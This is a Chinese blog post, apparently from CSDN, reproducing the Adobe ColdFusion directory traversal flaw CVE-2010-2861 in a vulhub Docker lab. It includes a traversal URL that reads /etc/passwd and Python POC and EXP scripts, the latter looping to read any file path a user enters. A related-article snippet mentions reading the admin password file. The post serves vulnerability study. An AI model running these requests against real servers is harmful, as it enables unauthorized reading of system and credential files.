Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)复现,python编写POC和EXP

最新推荐文章于 2024-05-14 23:46:30 发布
最新推荐文章于 2024-05-14 23:46:30 发布
阅读量463 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: python pycharm 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangqiao258/article/details/120566934
版权

环境搭建:

使用vulhub,进入对应文件夹启动Adobe CanFusion 8.0.1版本服务器:


[root@localhost ~]# cd /home/vulhub-master/coldfusion/CVE-2010-2861/
[root@localhost CVE-2010-2861]# docker-compose up -d

查看端口:

[root@localhost ~]# docker ps
CONTAINER ID   IMAGE                           COMMAND                  CREATED        STATUS        PORTS                                                 NAMES
781868f36616   vulhub/coldfusion:8.0.1         "bash -c '/opt/coldf…"   24 hours ago   Up 24 hours   0.0.0.0:8500->8500/tcp, :::8500->8500/tcp             cve-2010-2861_coldfusion_1

环境启动可能需要1~5分钟,启动后,访问http://your-ip:8500/CFIDE/administrator/enter.cfm,可以查看初始化页面,输入密码admin,开始初始化整个环境。

漏洞复现:
直接访问http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/etc/passwd%00en,Burp Suite查看文件,读取文件/etc/passwd:

在这里插入图片描述

POC编写:

import requests  

url = "http://192.168.33.170:8500/"  #url地址
poc = "CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en"  #读取/etc/passwd

res = requests.get(url+poc)  #发送请求
if  "/bin/bash"  in  res.text and res.status_code == 200: #利用 "/bin/bash" 特征和响应 200 判断
    print("CVE-2010-2861 存在")

pycharm运行结果:在这里插入图片描述

EXP编写:

import requests,re


url = "http://192.168.33.170:8500/"  #url地址
poc = "CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en"  #读取/etc/passwd

res = requests.get(url+poc)  #发送请求
if  "/bin/bash"  in  res.text and res.status_code == 200: #利用 "/bin/bash" 特征和响应 200 判断
    print("CVE-2010-2861 存在")

    while 1:  # EXP死循环
        dir = input("请输入你要读取的文件:")
        exp_res = requests.get(res.url.replace("/etc/passwd",dir))  #将要读取的/etc/passwd目录文件替换成输入的目录文件
        print(re.findall("<title>([\s\S]*?)</title>",exp_res.text))  #利用正则输出匹配的结果

pycharm运行结果:
在这里插入图片描述

~王
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Adobe ColdFusion 文件读取漏洞CVE-2010-2861
weixin_50698958的博客
10-02 428
一、概述 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。 参考: https://vulhub.org/#/environments/coldfusion/CVE-2010-2861/ 二、漏洞环境 路径:vulhub/coldfusion/CVE.
Vulhub-coldfusion--CVE-2017-3066
Ronin_qianmo的博客
07-29 444
1、漏洞描述 Adobe ColdFusion是美国Adobe公司的一种动态Web服务器产品,其运行的CFML(ColdFusion标记语言)是针对Web应用程序的一种程序设计语言。 攻击者可利用该漏洞在冲突应用程序的一部分中执行任意代码或造成拒绝服务。以下版本受到影响:Adobe ColdFusion(2016版)更新3及之前的版本, ColdFusion 11 Update 11及之前的版本,ColdFusion 10 Update 22及之前的版本。 2、启动靶场 3、访问网址 http://x.x
Adobe ColdFusion文件读取(CVE-2010-2861)
m0_65150886的博客
01-15 445
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。由于AJP协议设计存在缺陷导致内部相关的属性可控,攻击者可以构造属性值,使未授权的用户读取服务器任意文件获得敏感信息,甚至可以进行远程代码执行漏洞的利用。1.访问http://ip:port,出现如下页面,开始实验。2.构造poc读取/etc/passwd。3.构造poc读取后台管理员密码。
09 - vulhub - Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)
最新发布
碧海朝天素
05-14 773
如果你也是看准了Python,想自学Python,在这里为大家准备了丰厚的免费大礼包,带大家一起学习,给大家剖析Python兼职、就业行情前景的这些事儿。
[文件读取]coldfusion 文件读取CVE-2010-2861
wj33333的博客
11-14 298
描述: Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。访问`http://your-ip:8500/CFIDE/administrator/enter.cfm`,可以看到初始化页面,输入密码`admin`,开始初始化整个环境。
漏洞复现-coldfusion-文件读取】vulfocus/coldfusion-cve_2010_2861
10-15 962
coldfusion-文件读取
Adobe ColdFusion 目录遍历漏洞 (CVE-2010-2861)
zzzzz1284的博客
01-04 333
CVE-2010-2861
coldfusion-10-11-xss:CVE-2015-0345 (APSB15-07) 的概念验证代码
05-31
ColdFusion 10.x 11.x XSS -> RCE PoC 漏洞利用 此存储库包含 CVE-2015-0345 (APSB15-07) 的 XSS 向量,允许在 ColdFusion 安装上获得远程命令执行。 此漏洞仅对 ColdFusion 10 和 11 安装有效。 具体来说,...
cf-tinymce:用于创建tinyMCE实例的ColdFusion函数-支持压缩和每页多个实例
04-29
概要ColdFusion函数用于创建tinyMCE实例-使用CFN并允许每页多个实例。 这是一个不错的基础,具有不错的默认设置。...截屏屏幕快照显示了具有更多插件的实现:响应文件管理器,Bootstrap元素和codeMirror。
coldbox-platform:用于 ColdFusion (CFML) 的现代、流畅和基于约定的 HMVC 框架
08-04
自 2005 年以来,Luis Majano 和 Ortus Solutions, Corp 的 ColdBox 平台版权所有 | 由于上帝的恩典,这个项目存在。 如果你不喜欢这个,那就不要读它,它不适合你。 “因此,我们因信称义,通过我们的主耶稣基督...
Coldfusion-11-Application.cfc-Template:脚本样式 Application.cfc 模板,包含 Coldfusion 11 的所有方法
06-13
Coldfusion-11-Application.cfc-模板 包含 Coldfusion 11 的所有方法的脚本样式 Application.cfc 模板。 我对 Adob​​e 的文档和缺乏脚本风格的 Coldfusion 11 示例感到沮丧,所以我创建了这个。 如何使用 更改...
ColdFusion_Study.rar_ColdFusion stu_adobe coldfusion_coldfusion_
07-14
ColdFusion既是WEB服务器,也是一种WEB脚本语言,基于JAVA,非常适合企业网站建设。起源很早,大概1994年,原为一小公司产品,后为MacroMedia收购,现在Adobe。国内应用不多,国外好多企业都用的Coldfusion。如...
vulhub:Adobe ColdFusion文件读取漏洞复现CVE-2010-2861
sszsNo1的博客
07-02 257
vulhub:Adobe ColdFusion文件读取漏洞CVE-2010-2861)如何复现
ElasticSearch 目录穿越漏洞CVE-2015-3337)
黑白的博客
12-13 2215
声明 好好学习,天天向上 漏洞描述 在安装了具有“site”功能的插件以后,插件目录使用…/即可向上跳转,导致目录穿越漏洞,可读取任意文件。没有安装任意插件的elasticsearch不受影响。 影响范围 1.4.5以下/1.5.2以下 复现过程 这里使用v1.4.4版本 使用vulhub cd /app/vulhub-master/elasticsearch/CVE-2015-3337 使用docker启动 docker-compose up -d 环境启动后,访问http://your-ip:920
Adobe ColdFusion文件读取漏洞CVE-2010-2861
m0_73605862的博客
12-01 541
2.看答案就是一层一层进行路径穿越攻击,这里要注意如果登陆进去后总是会自己跳转到index.cfm,所以得用bp抓包改包。尝试利用漏洞读取目标系统中的“opt/coldfusion8/license.txt"文件。4.然后是opt那个,因为一般opt和etc在同一级目录下,结果成功了。3.之前一直出不来,今天突然出来了,我真的无语死了。1.环境搭建(网上写的密码是admin,就用admin)3.路径穿越就出来了。
coldfusion文件读取漏洞CVE-2010-2861
1stPeak's Blog
07-28 872
1、直接访问http//your-ip8500/CFIDE/administrator/enter.cfm?/etc/passwd%00en,即可读取文件/etc/passwd。2、读取后台管理员密码http//your-ip8500/CFIDE/administrator/enter.cfm?/lib/password.properties%00en。AdobeColdFusion8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。解密password。...
CVE-2010-2861Adobe ColdFusion 文件读取
Foreverlove112的博客
11-08 315
CVE-2010-2861Adobe ColdFusion 文件读取
Adobe ColdFusion 安装指南
"Adobe ColdFusion 安装指南" 本文档是Adobe ColdFusion的安装指南,适用于版本更新至2016年2月17日。ColdFusion是一种强大的Web应用开发平台,主要用于构建动态和交互式的网页应用程序。该指南详细介绍了安装过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值